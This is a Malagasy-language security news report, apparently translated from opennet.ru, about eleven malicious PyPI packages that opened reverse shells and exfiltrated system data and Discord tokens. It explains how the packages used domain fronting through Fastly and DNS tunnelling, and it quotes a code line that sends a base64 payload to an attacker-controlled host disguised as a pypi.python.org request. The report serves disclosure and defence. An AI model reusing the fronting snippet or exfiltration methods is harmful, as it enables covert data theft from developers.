Ao amin'ny lahatahiry PyPI (Python Package Index), fonosana 11 misy kaody ratsy no fantatra. Talohan'ny nahafantarana ny olana dia efa in-38 arivo teo ho eo ny fitambaran'ireo fonosana no alaina. Ireo fonosana maloto hita dia misongadina amin'ny fampiasan'izy ireo fomba be pitsiny hanafenana ny fantsom-pifandraisana miaraka amin'ireo mpizara mpanafika.
- importantpackage (6305 downloads), important-package (12897) - nametraka fifandraisana amin'ny mpizara ivelany amin'ny endrika mifandray amin'ny pypi.python.org mba hanomezana fidirana amin'ny shell amin'ny rafitra (reverse shell) ary nampiasa ny programa trevorc2 hanafenana ny fantsona fifandraisana.
- pptest (10001), ipboards (946) - nampiasa DNS ho fantsom-pifandraisana handefasana vaovao momba ny rafitra (ao amin'ny fonosana voalohany ny anaran'ny mpampiantrano, ny lahatahiry miasa, ny IP anatiny sy ivelany, ny faharoa - ny anaran'ny mpampiasa sy ny anaran'ny mpampiantrano) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - dia namaritra ny mari-pamantarana serivisy Discord tao amin'ny rafitra ary nandefa izany tany amin'ny mpampiantrano ivelany.
- trrfab (287) - nandefa ny famantarana, ny anaran'ny mpampiantrano ary ny votoatin'ny /etc/passwd, /etc/hosts, /home amin'ny mpampiantrano ivelany.
- 10Cent10 (490) - nanangana fifandraisana akora mivadika amin'ny mpampiantrano ivelany.
- yandex-yt (4183) - dia naneho hafatra momba ny rafitra voatohintohina ary naverina mankany amin'ny pejy misy fampahalalana fanampiny momba ny hetsika fanampiny navoaka tamin'ny nda.ya.ru (api.ya.cc).
Ny marihina manokana dia ny fomba fidirana amin'ireo mpampiantrano ivelany ampiasaina ao amin'ny fonosana important sy fonosana manan-danja, izay nampiasa ny tambajotra fandefasana votoaty Fastly ampiasaina ao amin'ny lahatahiry PyPI hanafina ny asany. Raha ny marina, nalefa tany amin'ny mpizara pypi.python.org ny fangatahana (anisan'izany ny famaritana ny anarana python.org amin'ny SNI ao anatin'ny fangatahana HTTPS), fa ny lohatenin'ny HTTP "Host" dia nahitana ny anaran'ny mpizara fehezin'ny mpanafika (sec. forward.io. global.prod.fastly.net). Nandefa fangatahana mitovitovy amin'ny mpizara mpanafika ny tambazotra fanaterana votoaty, amin'ny fampiasana ny mason'ny fifandraisana TLS amin'ny pypi.python.org rehefa mamindra angona.
Ny fotodrafitrasa PyPI dia ampiasain'ny tambajotra fandefasana votoaty Fastly, izay mampiasa ny proxy mangarahara Varnish mba hamenoana ny fangatahana mahazatra, ary mampiasa koa ny fanodinana taratasy fanamarinana TLS amin'ny ambaratonga CDN, fa tsy amin'ny lohamilina farany, handefasana ny fangatahana HTTPS amin'ny alΓ lan'ny proxy. Na inona na inona ny mpampiantrano kendrena, dia alefa any amin'ny proxy ny fangatahana, izay mamaritra ny mpampiantrano irina amin'ny alΓ lan'ny lohatenin'ny "Host" HTTP, ary ny anaran'ny sehatra mpampiantrano dia mifamatotra amin'ny adiresy IP mpandrindra entana CDN izay mahazatra ho an'ny mpanjifa Fastly rehetra.
Misoratra anarana amin'ny CDN Fastly ihany koa ny mpizara mpanafika, izay manome drafitra maimaim-poana ho an'ny rehetra ary mamela fisoratana anarana tsy fantatra anarana mihitsy aza. Tsara homarihina fa ny fandefasana fangatahana ho an'ny niharam-boina rehefa mamorona "akora mivadika", dia ampiasaina ihany koa ny tetika, saingy natomboka avy amin'ny sisin'ny mpampiantrano ilay mpanafika. Avy any ivelany, ny fifandraisana amin'ny mpizara mpanafika dia toa fivoriana ara-dalΓ na miaraka amin'ny lahatahiry PyPI, voarakotra amin'ny alΓ lan'ny taratasy fanamarinana PyPI TLS. Ny teknika mitovy amin'izany, fantatra amin'ny anarana hoe "domain fronting", dia nampiasaina taloha mba hanafenana ny anaran'ny mpampiantrano rehefa mandingana ny fanakanana, amin'ny fampiasana ny fahaiza-manao omena amin'ny tambajotra CDN sasany mba hidirana amin'ny HTTPS amin'ny fanondroana mpampiantrano foronina ao amin'ny SNI ary tena mampita ny anaran'ny SNI. nangataka mpampiantrano ao amin'ny lohatenin'ny HTTP Host ao anatin'ny fivoriana TLS.
Mba hanafenana ny asa ratsy, ny fonosana TrevorC2 dia nampiasaina koa mba hifaneraserana amin'ny mpizara mitovy amin'ny fitetezana tranonkala mahazatra, ohatra, ny fangatahana ratsy dia nalefa amin'ny endrika misintona ny sary "https://pypi.python.org/images/ guid = "miaraka amin'ny famandrihana fampahalalana amin'ny paramètre guid. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Ny fonosana pptest sy ipboards dia nampiasa fomba hafa hanafenana ny asan'ny tambajotra, mifototra amin'ny fametahana fampahalalana mahasoa amin'ny fanontaniana amin'ny mpizara DNS. Ny malware dia mampita vaovao amin'ny alΓ lan'ny fanatanterahana ny fangatahana DNS toy ny "nu4timjagq4fimbuhe.example.com", izay misy ny angon-drakitra ampitaina amin'ny mpizara fanaraha-maso amin'ny fampiasana ny format base64 amin'ny anaran'ny subdomain. Ny mpanafika dia mandray ireo hafatra ireo amin'ny alΓ lan'ny fifehezana ny mpizara DNS ho an'ny sehatra example.com.
Source: opennet.ru